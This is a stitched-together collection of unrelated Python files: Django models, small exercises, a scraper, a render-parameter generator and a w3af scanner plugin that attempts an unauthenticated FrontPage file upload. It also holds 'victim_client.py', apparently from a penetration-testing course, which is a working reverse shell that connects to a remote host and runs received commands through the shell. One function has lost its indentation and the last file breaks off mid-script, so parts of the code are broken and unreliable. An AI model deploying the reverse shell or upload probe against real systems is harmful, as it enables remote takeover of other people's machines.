    path = models.TextField()
    slice_name = models.TextField(blank=True, default="")
    definition_id = models.TextField()
    resource = models.ForeignKey(Resource, related_name="attributes", on_delete=models.CASCADE)
    updated_at = models.DateTimeField(auto_now=True)
    created_at = models.DateTimeField(auto_now_add=True)


class Comment(models.Model):
    id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
    content = models.TextField()
    validated = models.BooleanField(default=False)
    author = models.ForeignKey(settings.AUTH_USER_MODEL, related_name="comments", on_delete=models.CASCADE)
    attribute = models.ForeignKey(Attribute, related_name="comments", on_delete=models.CASCADE)
    updated_at = models.DateTimeField(auto_now=True)
    created_at = models.DateTimeField(auto_now_add=True)


class InputGroup(models.Model):
    id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
    merging_script = models.TextField(blank=True, default="")
    attribute = models.ForeignKey(Attribute, related_name="input_groups", on_delete=models.CASCADE)
    updated_at = models.DateTimeField(auto_now=True)
    created_at = models.DateTimeField(auto_now_add=True)


class Input(models.Model):
    id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
    updated_at = models.DateTimeField(auto_now=True)
    created_at = models.DateTimeField(auto_now_add=True)

    class Meta:
        abstract = True


class StaticInput(Input):
    input_group = models.ForeignKey(InputGroup, related_name="static_inputs", on_delete=models.CASCADE)
    value = models.TextField(blank=True, null=True, default=None)


class SQLInput(Input):
    input_group = models.ForeignKey(
        InputGroup, blank=True, null=True, related_name="sql_inputs", on_delete=models.CASCADE
    )
    column = models.OneToOneField("Column", related_name="sql_input", on_delete=models.CASCADE)
    script = models.TextField(blank=True, default="")
    concept_map_id = models.TextField(blank=True, default="")


class Column(models.Model):
    id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
    table = models.TextField()
    column = models.TextField()
    owner = models.ForeignKey("Owner", related_name="columns", on_delete=models.RESTRICT)
    updated_at = models.DateTimeField(auto_now=True)
    created_at = models.DateTimeField(auto_now_add=True)


class Join(models.Model):
    id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
    sql_input = models.ForeignKey(SQLInput, related_name="joins", on_delete=models.CASCADE)
    left = models.ForeignKey(Column, related_name="joined_left", on_delete=models.CASCADE)
    right = models.ForeignKey(Column, related_name="joined_right", on_delete=models.CASCADE)
    updated_at = models.DateTimeField(auto_now=True)
    created_at = models.DateTimeField(auto_now_add=True)


class Condition(models.Model):
    class Action(models.TextChoices):
        INCLUDE = "INCLUDE"
        EXCLUDE = "EXCLUDE"

    class Relation(models.TextChoices):
        EQUAL = "EQ"
        GREATER = "GT"
        GREATER_OR_EQUAL = "GE"
        LESSER = "LT"
        LESSER_OR_EQUAL = "LE"
        NOTNULL = "NOTNULL"
        NULL = "NULL"

    id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
    action = models.TextField(choices=Action.choices)
    sql_input = models.OneToOneField(SQLInput, on_delete=models.CASCADE)
    value = models.TextField(blank=True, default="")
    input_group = models.ForeignKey(InputGroup, related_name="conditions", on_delete=models.CASCADE)
    relation = models.TextField(choices=Relation.choices, default=Relation.EQUAL)


class Filter(models.Model):
    class Relation(models.TextChoices):
        EQUAL = "="
        NOT_EQUAL = "<>"
        IN = "IN"
        GREATER = ">"
        GREATER_OR_EQUAL = ">="
        LESSER = "<"
        LESSER_OR_EQUAL = "<="

    id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
    relation = models.TextField(choices=Relation.choices)
    value = models.TextField(blank=True, default="")
    resource = models.ForeignKey(Resource, related_name="filters", on_delete=models.CASCADE)
    sql_input = models.OneToOneField(SQLInput, on_delete=models.CASCADE)


class Owner(models.Model):
    class Meta:
        unique_together = (("name", "credential"),)

    id_ = models.TextField(name="id", primary_key=True, default=cuid, editable=False)
    name = models.TextField()
    schema = models.JSONField(blank=True, null=True)
    credential = models.ForeignKey(Credential, related_name="owners", on_delete=models.CASCADE)
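Every `id` field above passes `default=cuid` — the callable itself, not `cuid()` — so the generator runs once per row and each record gets a fresh id. The same pattern with a stand-in generator (`fake_cuid` is illustrative, not the real `cuid` package):

```python
import secrets

def fake_cuid():
    # stand-in for cuid(): a fresh, collision-resistant string id starting with 'c'
    return "c" + secrets.token_hex(12)

def make_row(default=fake_cuid):
    # a callable default is re-evaluated per row; a literal would be shared by all rows
    return {"id": default()}

a, b = make_row(), make_row()
assert a["id"] != b["id"]
assert a["id"].startswith("c")
```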

# --- viewmodels/shared/viewmodel.py (PASTAplus/web-x, Apache-2.0) ---

#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
:Mod: viewmodel

:Synopsis:

:Author:
    servilla

:Created:
    5/25/21
"""
from typing import Optional

from starlette.requests import Request

from services import cookie_auth


class ViewModelBase:
    def __init__(self, request: Request):
        self.request: Request = request
        self.error: Optional[str] = None
        self.user_id: Optional[str] = None
        self.is_logged_in, self.common_name = cookie_auth.get_user_via_auth_cookie(self.request)

    def to_dict(self) -> dict:
        return self.__dict__
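`to_dict` works because every attribute assigned in `__init__` lands in the instance `__dict__`, which is exactly the flat mapping a template context wants. A minimal stand-in without the Starlette request (hypothetical values, for illustration only):

```python
class MiniViewModel:
    def __init__(self):
        self.error = None
        self.user_id = "abc123"  # hypothetical value
        self.is_logged_in = True

    def to_dict(self) -> dict:
        return self.__dict__

vm = MiniViewModel()
assert vm.to_dict() == {"error": None, "user_id": "abc123", "is_logged_in": True}
```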

# --- packages/w3af/w3af/plugins/audit/frontpage.py (ZooAtmosphereGroup/HelloPackages, Apache-2.0; also at tools/w3af/w3af/plugins/audit/frontpage.py in sravani-m/Web-Application-Security-Framework, MIT) ---

"""
frontpage.py
Copyright 2006 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import w3af.core.controllers.output_manager as om
import w3af.core.data.kb.knowledge_base as kb
import w3af.core.data.constants.severity as severity

from w3af.core.controllers.exceptions import BaseFrameworkException
from w3af.core.controllers.plugins.audit_plugin import AuditPlugin
from w3af.core.data.bloomfilter.scalable_bloom import ScalableBloomFilter
from w3af.core.data.misc.encoding import smart_str_ignore
from w3af.core.data.fuzzer.utils import rand_alpha
from w3af.core.data.kb.vuln import Vuln

POST_BODY = ('method=put document:%s&service_name=&document=[document_name=%s'
             ';meta_info=[]]&put_option=overwrite&comment=&'
             'keep_checked_out=false\n')


class frontpage(AuditPlugin):
    """
    Tries to upload a file using frontpage extensions (author.dll).

    :author: Andres Riancho (andres.riancho@gmail.com)
    """

    def __init__(self):
        AuditPlugin.__init__(self)

        # Internal variables
        self._already_tested = ScalableBloomFilter()
        self._author_url = None

    def _get_author_url(self):
        if self._author_url is not None:
            return self._author_url

        for info in kb.kb.get('frontpage_version', 'frontpage_version'):
            author_url = info.get('FPAuthorScriptUrl', None)
            if author_url is not None:
                self._author_url = author_url
                return self._author_url

        return None

    def audit(self, freq, orig_response, debugging_id):
        """
        Searches for file upload vulns using a POST to author.dll.

        :param freq: A FuzzableRequest
        :param orig_response: The HTTP response associated with the fuzzable request
        :param debugging_id: A unique identifier for this call to audit()
        """
        # Only run if we have the author URL for this frontpage instance
        if self._get_author_url() is None:
            return

        # Only identify one vulnerability of this type
        if kb.kb.get(self, 'frontpage'):
            return

        domain_path = freq.get_url().get_domain_path()

        # Upload only once to each directory
        if domain_path in self._already_tested:
            return

        self._already_tested.add(domain_path)

        rand_file = rand_alpha(6) + '.html'
        upload_id = self._upload_file(domain_path, rand_file, debugging_id)
        self._verify_upload(domain_path, rand_file, upload_id, debugging_id)

    def _upload_file(self, domain_path, rand_file, debugging_id):
        """
        Upload the file using author.dll

        :param domain_path: http://localhost/f00/
        :param rand_file: <random>.html
        """
        # TODO: The frontpage version should be obtained from the information
        #       saved in the kb by the infrastructure.frontpage_version plugin!
        #
        #       The 4.0.2.4715 version should be dynamic!
        version = '4.0.2.4715'

        file_path = domain_path.get_path() + rand_file

        data = POST_BODY % (version, file_path)
        data += rand_file[::-1]
        data = smart_str_ignore(data)

        target_url = self._get_author_url()

        try:
            res = self._uri_opener.POST(target_url,
                                        data=data,
                                        debugging_id=debugging_id)
        except BaseFrameworkException as e:
            om.out.debug('Exception while uploading file using author.dll: %s' % e)
            return None
        else:
            if res.get_code() in [200]:
                om.out.debug('frontpage plugin seems to have successfully uploaded'
                             ' a file to the remote server.')
            return res.id

    def _verify_upload(self, domain_path, rand_file, upload_id, debugging_id):
        """
        Verify if the file was uploaded.

        :param domain_path: http://localhost/f00/
        :param rand_file: The filename that was (potentially) uploaded
        :param upload_id: The id of the POST request to author.dll
        """
        target_url = domain_path.url_join(rand_file)

        try:
            res = self._uri_opener.GET(target_url,
                                       cache=False,
                                       grep=False,
                                       debugging_id=debugging_id)
        except BaseFrameworkException as e:
            om.out.debug('Exception while verifying if the file that was uploaded'
                         ' using author.dll was there: %s' % e)
        else:
            # The file we uploaded has the reversed filename as body
            if rand_file[::-1] not in res.get_body():
                return

            desc = ('An insecure configuration in the frontpage extensions'
                    ' allows unauthenticated users to upload files to the'
                    ' remote web server.')

            response_ids = [upload_id, res.id] if upload_id is not None else [res.id]

            v = Vuln('Insecure Frontpage extensions configuration', desc,
                     severity.HIGH, response_ids, self.get_name())
            v.set_url(target_url)
            v.set_method('POST')

            om.out.vulnerability(v.get_desc(), severity=v.get_severity())
            self.kb_append(self, 'frontpage', v)

    def get_plugin_deps(self):
        """
        :return: A list with the names of the plugins that should be run before
                 the current one.
        """
        return ['infrastructure.frontpage_version']

    def get_long_desc(self):
        """
        :return: A DETAILED description of the plugin functions and features.
        """
        return """
        This plugin audits the frontpage extension configuration by trying to
        upload a file to the remote server using the author.dll script provided
        by FrontPage.
        """

# --- example/example/spiders/javdb.py (hwpchn/AroayCloudScraper, MIT) ---

import scrapy
from aroay_cloudscraper import CloudScraperRequest


class JavdbSpider(scrapy.Spider):
    name = 'javdb'
    allowed_domains = ['javdb.com']
    headers = {"Accept-Language": "zh-cn;q=0.8,en-US;q=0.6"}

    def start_requests(self):
        yield CloudScraperRequest("https://javdb.com/v/BOeQO", callback=self.parse)

    def parse(self, response):
        print(response.text)

# --- 0x05-python-exceptions/2-safe_print_list_integers.py (C-distin/alx-higher_level_programming, MIT) ---

#!/usr/bin/python3
def safe_print_list_integers(my_list=[], x=0):
    i = 0
    for index in range(x):
        try:
            print("{:d}".format(my_list[index]), end="")
            i += 1
        except (ValueError, TypeError):
            pass
    print()
    return i
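A quick capture of the behavior: values that `"{:d}"` cannot format raise `ValueError` or `TypeError` and are silently skipped, and the return value counts only what was printed. The function is restated here so the snippet runs on its own:

```python
import io
from contextlib import redirect_stdout

def safe_print_list_integers(my_list=[], x=0):
    i = 0
    for index in range(x):
        try:
            print("{:d}".format(my_list[index]), end="")
            i += 1
        except (ValueError, TypeError):
            pass
    print()
    return i

buf = io.StringIO()
with redirect_stdout(buf):
    printed = safe_print_list_integers([4, "eight", 15, 16.0, 23], 5)

assert printed == 3                # "eight" and 16.0 were skipped
assert buf.getvalue() == "41523\n"
```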

# --- devind_helpers/import_from_file/json_reader.py (devind-team/devind-django-helpers, MIT) ---

"""Module for the json-format reader."""
import json

from typing import Iterable

from .base_reader import BaseReader


class JsonReader(BaseReader):
    """Reader for the json format."""

    def __init__(self, path: str):
        """Constructor of the json-format reader.

        :param path: path to the file
        """
        super().__init__(path)

    @property
    def items(self) -> Iterable:
        """Iterate over the rows."""
        for row in json.load(open(self.path, encoding='utf-8')):
            yield row
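A usage sketch: `items` lazily yields the top-level elements of a JSON array. `BaseReader` is re-sketched here under the assumption that it only stores the path (its real definition lives in `.base_reader`):

```python
import json
import tempfile

class BaseReader:
    # assumed minimal behavior of the real BaseReader
    def __init__(self, path: str):
        self.path = path

class JsonReader(BaseReader):
    @property
    def items(self):
        for row in json.load(open(self.path, encoding='utf-8')):
            yield row

with tempfile.NamedTemporaryFile('w', suffix='.json', delete=False, encoding='utf-8') as fh:
    json.dump([{"id": 1}, {"id": 2}], fh)

rows = list(JsonReader(fh.name).items)
assert rows == [{"id": 1}, {"id": 2}]
```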

# --- sim2real_docs/create_random_values.py (agchang-cgl/sim2real-docs, Apache-2.0) ---

# Copyright FMR LLC <opensource@fidelity.com>
# SPDX-License-Identifier: Apache-2.0

"""
The script generates variations for the parameters using configuration file and stores them in respective named tuple
"""
import math
import random
from collections import namedtuple

import numpy as np

# configuration parameters
scene_options = [
    "aspect_ratio",
    "color_mode",
    "exposure_value",
    "contrast",
    "crop_min_x",
    "crop_max_x",
    "crop_min_y",
    "crop_max_y",
    "resolution_x",
    "resolution_y",
    "resolution_percentage",
    "render_engine",
]
Scene_tuple = namedtuple(
    "SceneParameters", scene_options, defaults=[None] * len(scene_options)
)

light_options = [
    "light_energies",
    "light_x_location",
    "light_y_location",
    "light_z_location",
    "color_hue",
    "color_saturation",
    "color_value",
    "light_type",
]
Light_tuple = namedtuple(
    "LightParameters", light_options, defaults=[None] * len(light_options)
)

camera_options = [
    "camera_x_location",
    "camera_y_location",
    "camera_z_location",
    "camera_x_rotation",
    "camera_y_rotation",
    "camera_z_rotation",
    "camera_focal_length",
]
Camera_tuple = namedtuple(
    "CameraParameters", camera_options, defaults=[None] * len(camera_options)
)

image_options = [
    "image_x_scale",
    "image_y_scale",
    "image_z_scale",
    "image_x_rotation",
    "image_y_rotation",
    "image_z_rotation",
    "image_bbs",
    "background_image_name",
    "image_name",
]
Image_tuple = namedtuple(
    "ImageParameters", image_options, defaults=[None] * len(image_options)
)

other_options = ["render_device_type"]
other_parameter_tuple = namedtuple(
    "OtherBlenderParameters", other_options, defaults=[None] * len(other_options)
)
def random_range(configs, variable, variations):
    """
    Generate random values for the variable on a continuous scale
    """
    random_values = np.random.uniform(
        configs[variable]["range"][0], configs[variable]["range"][1], variations
    )
    return random_values


def random_categorical_values(configs, variable, variations):
    """
    Generate random values for the variable (e.g. aspect ratio etc.)

    If weight values are not given, the function assigns equal weight to all the values
    """
    try:
        weight_values = configs[variable]["weights"]
    except KeyError:
        weight_values = [1.0] * len(configs[variable]["range"])
    random_values = random.choices(
        configs[variable]["range"], k=variations, weights=weight_values
    )
    return random_values
def get_image_parameters(
    n_variations: int, image_configs: dict, image_files: list, bg_list: list
):
    """
    Generate image variations based on random values in config file and creates a named tuple for each variation
    """
    # sampling background images from background image files
    if len(bg_list) == 0:
        bg_images = [""] * len(image_files)
    else:
        bg_images = [random.choice(bg_list) for i in range(len(image_files))]
    image_parameters_list = [Image_tuple for i in range(n_variations)]
    image_scale_x_values = random_range(image_configs, "image_x_scale", n_variations)
    image_scale_y_values = random_range(image_configs, "image_y_scale", n_variations)
    image_scale_z_values = random_range(image_configs, "image_z_scale", n_variations)
    image_rotation_x_values = random_range(
        image_configs, "image_x_rotation", n_variations
    )
    image_rotation_y_values = random_range(
        image_configs, "image_y_rotation", n_variations
    )
    image_rotation_z_values = random_range(
        image_configs, "image_z_rotation", n_variations
    )
    for index, _ in enumerate(image_parameters_list):
        image_parameters_list[index] = image_parameters_list[index](
            image_x_scale=image_scale_x_values[index],
            image_y_scale=image_scale_y_values[index],
            image_z_scale=image_scale_z_values[index],
            image_x_rotation=image_rotation_x_values[index],
            image_y_rotation=image_rotation_y_values[index],
            image_z_rotation=image_rotation_z_values[index],
            image_bbs=[],
            image_name=image_files[index],
            background_image_name=bg_images[index],
        )
    return image_parameters_list
def get_other_blender_parameters(other_parameters: dict):
    other_parameter_tuple_value = other_parameter_tuple(
        render_device_type=other_parameters["render_device_type"]
    )
    return other_parameter_tuple_value
def get_camera_parameters(n_variations: int, camera_configs: dict):
    """
    Generate camera variations based on random values in config file and creates a named tuple for each variation
    """
    camera_parameters_list = [Camera_tuple for i in range(n_variations)]
    camera_focal_length_values = random_range(
        camera_configs, "camera_focal_length", n_variations
    )
    camera_x_location_values = random_range(
        camera_configs, "camera_x_location", n_variations
    )
    camera_y_location_values = random_range(
        camera_configs, "camera_y_location", n_variations
    )
    camera_z_location_values = random_range(
        camera_configs, "camera_z_location", n_variations
    )
    camera_x_rotation_values = random_range(
        camera_configs, "camera_x_rotation", n_variations
    )
    camera_y_rotation_values = random_range(
        camera_configs, "camera_y_rotation", n_variations
    )
    camera_z_rotation_values = random_range(
        camera_configs, "camera_z_rotation", n_variations
    )
    for index, _ in enumerate(camera_parameters_list):
        camera_parameters_list[index] = camera_parameters_list[index](
            camera_x_location=camera_x_location_values[index],
            camera_y_location=camera_y_location_values[index],
            camera_z_location=camera_z_location_values[index],
            camera_focal_length=camera_focal_length_values[index],
            camera_x_rotation=math.radians(camera_x_rotation_values[index]),
            camera_y_rotation=math.radians(camera_y_rotation_values[index]),
            camera_z_rotation=math.radians(camera_z_rotation_values[index]),
        )
    return camera_parameters_list
def get_light_parameters(n_variations: int, light_configs: dict):
    """
    Generate light variations based on random values in config file and creates a named tuple for each variation
    """
    light_parameters_list = [Light_tuple for i in range(n_variations)]
    light_energies = random_range(light_configs, "light_energy", n_variations)
    light_type_values = random_categorical_values(
        light_configs, "light_types", n_variations
    )
    hue = random_range(light_configs, "hue", n_variations)
    saturation = random_range(light_configs, "saturation", n_variations)
    value = random_range(light_configs, "value", n_variations)
    light_x_values = random_range(light_configs, "light_x_location", n_variations)
    light_y_values = random_range(light_configs, "light_y_location", n_variations)
    light_z_values = random_range(light_configs, "light_z_location", n_variations)
    for index, _ in enumerate(light_parameters_list):
        light_parameters_list[index] = light_parameters_list[index](
            light_energies=light_energies[index],
            light_x_location=light_x_values[index],
            light_y_location=light_y_values[index],
            light_z_location=light_z_values[index],
            color_hue=hue[index],
            color_saturation=saturation[index],
            color_value=value[index],
            light_type=light_type_values[index],
        )
    return light_parameters_list
def get_scene_parameters(n_variations: int, scene_config: dict):
"""
Generate scene variations based on random values in config file and creates a named tuple for each variation
"""
scene_parameters_list = [Scene_tuple for i in range(n_variations)]
aspect_ratio_values = random_categorical_values(
scene_config, "aspect_ratio", n_variations
)
color_mode_values = random_categorical_values(
scene_config, "color_modes", n_variations
)
resolution_values = random_categorical_values(
scene_config, "resolution", n_variations
)
contrast_values = random_categorical_values(scene_config, "contrast", n_variations)
render_engine_values = random_categorical_values(
scene_config, "render_engine", n_variations
)
exposure_value_values = random_range(scene_config, "exposure", n_variations)
crop_min_x_values = random_range(scene_config, "crop_min_x", n_variations)
crop_max_x_values = random_range(scene_config, "crop_max_x", n_variations)
crop_min_y_values = random_range(scene_config, "crop_min_y", n_variations)
crop_max_y_values = random_range(scene_config, "crop_max_y", n_variations)
resolution_percentage_values = random_range(
scene_config, "resolution_percentage", n_variations
)
for index, _ in enumerate(scene_parameters_list):
scene_parameters_list[index] = scene_parameters_list[index](
aspect_ratio=aspect_ratio_values[index],
color_mode=color_mode_values[index],
exposure_value=exposure_value_values[index],
contrast=contrast_values[index],
crop_min_x=crop_min_x_values[index],
crop_max_x=crop_max_x_values[index],
crop_min_y=crop_min_y_values[index],
crop_max_y=crop_max_y_values[index],
resolution_x=resolution_values[index][0],
resolution_y=resolution_values[index][1],
resolution_percentage=resolution_percentage_values[index],
render_engine=render_engine_values[index],
)
return scene_parameters_list
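The `random_range` and `random_categorical_values` helpers used throughout these generators are not shown in this excerpt. A minimal sketch consistent with how they are called — assuming each config key maps to a `[min, max]` pair or a list of choices, which is an assumption, not the project's actual layout — could be:

```python
import random


def random_range(configs: dict, key: str, n_variations: int) -> list:
    # Assumed layout: configs[key] == [min_value, max_value]
    low, high = configs[key]
    return [random.uniform(low, high) for _ in range(n_variations)]


def random_categorical_values(configs: dict, key: str, n_variations: int) -> list:
    # Assumed layout: configs[key] == list of allowed choices
    return [random.choice(configs[key]) for _ in range(n_variations)]
```

Each helper returns one sampled value per variation, which is why the loops above can index the returned lists with the variation index.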
# ---- file: 006 - Simple Netcat Replacement/victim_client.py (repo: Danziger/Pluralsight-Network-Penetration-Testing-Using-Python-and-Kali-Linux, license: MIT) ----
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import subprocess
import socket
import argparse


def usage():
    print '\n\nExample:'
    print 'victim_client.py -a 192.168.0.33 -p 9999'
    exit(0)


def execute_command(cmd):
    cmd = cmd.rstrip()  # Remove trailing whitespace and the newline
    try:
        results = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
    except Exception, e:
        results = 'Could not execute the command: ' + cmd
    return results


def rcv_data(client):
    try:
        while True:
            rcv_cmd = ''
            rcv_cmd += client.recv(4096)
            if not rcv_cmd:
                continue
            client.send(execute_command(rcv_cmd))
    except Exception, e:
        print str(e)
        pass


def client_connect(host, port):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        client.connect((host, port))
        print 'Connected with %s:%d' % (host, port)
        rcv_data(client)
    except Exception, e:
        print str(e)
    client.close()


def main():
    parser = argparse.ArgumentParser('Victim\'s Client Commander')
    parser.add_argument('-a', '--address', type=str, help='The server IP address')
    parser.add_argument('-p', '--port', type=int, help='The port number to connect with', default=9999)
    args = parser.parse_args()
    if args.address is None:
        usage()
    client_connect(args.address, args.port)


if __name__ == '__main__':
    main()
# ---- file: etc/ChokudaiSpeedrun002/f.py (repo: wotsushi/competitive-programming, license: MIT) ----
N = int(input())
A, B = (
    zip(*(map(int, input().split()) for _ in range(N))) if N else
    ((), ())
)
ans = len({(min(a, b), max(a, b)) for a, b in zip(A, B)})
print(ans)
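The script counts how many distinct unordered pairs appear among the N input pairs. The same core idea, demonstrated on a fixed list instead of stdin (the sample data below is made up for illustration):

```python
# Pairs read as (a, b); (1, 2) and (2, 1) should count as one pair.
pairs = [(1, 2), (2, 1), (3, 3), (1, 2)]
A, B = zip(*pairs)

# Normalizing each pair to (min, max) makes order irrelevant,
# and the set comprehension removes duplicates.
distinct = {(min(a, b), max(a, b)) for a, b in zip(A, B)}
print(len(distinct))  # → 2
```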
# ---- file: app/serializer.py (repo: james-muriithi/django-api, license: MIT) ----
from rest_framework import serializers
from .models import News, User


class UserSerializer(serializers.ModelSerializer):
    class Meta:
        model = User
        exclude = ['password']


class NewsSerializer(serializers.ModelSerializer):
    user = UserSerializer(read_only=True)
    user_id = serializers.IntegerField()

    class Meta:
        model = News
        fields = '__all__'
        read_only_fields = ['created_at', 'id']
# ---- file: circles/migrations/0014_auto_20200506_2128.py (repo: CoronaCircles/coronacircles, license: MIT) ----
# Generated by Django 3.0.6 on 2020-05-06 19:28
from django.conf import settings
from django.db import migrations, models


def create_through_relations(apps, schema_editor):
    Event = apps.get_model("circles", "Event")
    Participation = apps.get_model("circles", "Participation")
    for event in Event.objects.all():
        for participant in event.participants.all():
            Participation.objects.get_or_create(user=participant, event=event)


class Migration(migrations.Migration):

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ("circles", "0013_auto_20200506_2117"),
    ]

    operations = [migrations.RunPython(create_through_relations)]
# ---- file: codigo/Live171/exemplo_04.py (repo: BrunoPontesLira/live-de-python, license: MIT) ----
d = {'a': 1, 'c': 3}
match d:
    case {'a': chave_a, 'b': _}:
        print(f'key A {chave_a=} + key B')
    case {'a': _} | {'c': _}:
        print('key A or C')
    case {}:
        print('empty')
    case _:
        print("Don't know")
# ---- file: vb2py/PythonCard/samples/multicolumnexample/multicolumnexample.rsrc.py (repo: ceprio/xl_vb2py, license: BSD-3-Clause) ----
{'application': {
    'type': 'Application',
    'name': 'MulticolumnExample',
    'backgrounds': [
        {'type': 'Background',
         'name': 'bgMulticolumnExample',
         'title': 'Multicolumn Example PythonCard Application',
         'size': (620, 500),
         'menubar': {
             'type': 'MenuBar',
             'menus': [
                 {'type': 'Menu',
                  'name': 'menuFile',
                  'label': '&File',
                  'items': [
                      {'type': 'MenuItem',
                       'name': 'menuFileExit',
                       'label': 'E&xit\tAlt+X',
                       'command': 'exit'},
                  ]},
             ],
         },
         'components': [
             {'type': 'Button',
              'name': 'demoButton',
              'position': (510, 5),
              'size': (85, 25),
              'label': 'Load Demo'},
             {'type': 'Button',
              'name': 'clearButton',
              'position': (510, 30),
              'size': (85, 25),
              'label': 'Clear'},
             {'type': 'Button',
              'name': 'loadButton',
              'position': (510, 55),
              'size': (85, 25),
              'label': 'Load CSV'},
             {'type': 'Button',
              'name': 'appendButton',
              'position': (510, 80),
              'size': (85, 25),
              'label': 'Append CSV'},
             {'type': 'Button',
              'name': 'swapButton',
              'position': (510, 105),
              'size': (85, 25),
              'label': 'Swap Lists'},
             {'type': 'Button',
              'name': 'prevButton',
              'position': (510, 130),
              'size': (85, 25),
              'label': 'Prev'},
             {'type': 'Button',
              'name': 'nextButton',
              'position': (510, 155),
              'size': (85, 25),
              'label': 'Next'},
             {'type': 'Button',
              'name': 'exitButton',
              'position': (510, 180),
              'size': (85, 25),
              'label': 'Exit'},
             {'type': 'MultiColumnList',
              'name': 'theList',
              'position': (3, 3),  # 10, 305
              'size': (500, 390),
              'columnHeadings': ['Example List'],
              'items': ['Example 1', 'Example 2', 'Example 3']},
             {'type': 'TextArea',
              'name': 'displayArea',
              'position': (3, 398),
              'size': (500, 40),
              'font': {'family': 'monospace', 'size': 12}},
             {'type': 'TextArea',
              'name': 'countArea',
              'position': (507, 398),
              'size': (85, 40),
              'font': {'family': 'monospace', 'size': 12}},
         ]},
    ],
}}
# ---- file: udp-client.py (repo: fionahiklas/udp-broadcast-examples, license: MIT) ----
import socket, traceback
host = '255.255.255.255'  # Limited broadcast address: send to all hosts on the local network
port = 2081

print "Creating socket on port: ", port
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

# print "Setting REUSEADDR option"
# s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

print "Setting SO_BROADCAST option"
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)

print "Connecting to host: ", host
s.connect((host, port))

try:
    print "Going to send data ..."
    s.send("I am here")
    print "... sent"
except (KeyboardInterrupt, SystemExit):
    raise
except:
    traceback.print_exc()
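The file above is only the broadcast sender. A matching receiver — sketched here in Python 3, since it is not part of the repo excerpt — just binds a UDP socket on the same port and reads datagrams:

```python
import socket


def make_udp_listener(port: int) -> socket.socket:
    """Bind a UDP socket that can receive datagrams (broadcasts included) on `port`."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # Allow quick rebinding of the port between runs.
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", port))  # "" binds every local interface
    return sock


# Typical use against the sender above:
#   listener = make_udp_listener(2081)
#   data, addr = listener.recvfrom(4096)
```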
# ---- file: boxplots.py (repo: wrightaprilm/plaus, license: MIT) ----
import pandas as pd
import os
import re
import dendropy
from dendropy.utility.fileutils import find_files
import matplotlib.pyplot as plt
plt.style.use('ggplot')
default = pd.read_csv('./d.csv')
uniform = pd.read_csv('./1.csv')
exp = pd.read_csv('./e.csv')
fixed = pd.read_csv('./2.csv')
uniform.columns = ['a','uni', 'b','c','d']
default.columns = ['a','def', 'b','c','d']
exp.columns = ['a','exp', 'b','c','d']
fixed.columns = ['a','fix', 'b','c','d']
uniform = uniform.drop(['b','c','d'],axis=1)
fixed =fixed.drop(['b','c','d'],axis=1)
exp =exp.drop(['b','c','d'],axis=1)
default =default.drop(['b','c','d'],axis=1)
merged_inner = pd.merge(left=default, right=exp, left_on='a', right_on = 'a')
merged_inner = pd.merge(left=merged_inner, right=fixed,left_on='a', right_on = 'a')
merged_inner = pd.merge(left=merged_inner, right=uniform, left_on='a', right_on = 'a')
merged_inner['default'] = merged_inner['def']/10
merged_inner['expo'] = merged_inner['exp']/10
merged_inner['fixed'] = merged_inner['fix']/10
merged_inner['uniform'] = merged_inner['uni']/10
merged_inner = merged_inner.drop(['def','exp','fix','uni','a'],axis=1)
merged_inner.plot(kind='box').set_ylim(-.2,1)
plt.show()
# ---- file: back-end/src/handler/util/user_util_test.py (repo: gfxcc/san11-platform-back-end, license: MIT) ----
import unittest
import uuid

from . import user_util


class TestUtilFuncs(unittest.TestCase):
    def test_hash_and_verify_password(self):
        passwords = [str(uuid.uuid4()) for i in range(10)]
        for pw in passwords:
            self.assertTrue(
                user_util.verify_password(pw, user_util.hash_password(pw))
            )
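The `user_util` module under test is not included in this excerpt. One minimal salted-hash implementation that would satisfy the round-trip assertion above (an illustration built on the stdlib, not the project's actual code):

```python
import hashlib
import hmac
import os


def hash_password(password: str) -> str:
    """Return 'salt$digest' using PBKDF2-HMAC-SHA256 with a fresh random salt."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt.hex() + "$" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    salt = bytes.fromhex(salt_hex)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return hmac.compare_digest(digest.hex(), digest_hex)
```

Because the salt is random per call, two hashes of the same password differ, yet each verifies against the password it was derived from.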
# ---- file: ex042.py (repo: ArthurCorrea/python-exercises, license: MIT) ----
# Redo challenge 035, adding a feature that reports which
# type of triangle will be formed:
# - Equilateral: all sides equal;
# - Isosceles: two sides equal;
# - Scalene: all sides different.
# - Escaleno: todos os lados diferentes.
n1 = float(input('\033[34mMedida 1:\033[m '))
n2 = float(input('\033[31mMedida 2:\033[m '))
n3 = float(input('\033[36mMedida 3:\033[m '))
if n1 < n2 + n3 and n2 < n1 + n3 and n3 < n1 + n2:
print('\033[30mCom essas medidas É POSSÍVEL montarmos um triângulo!\033[m')
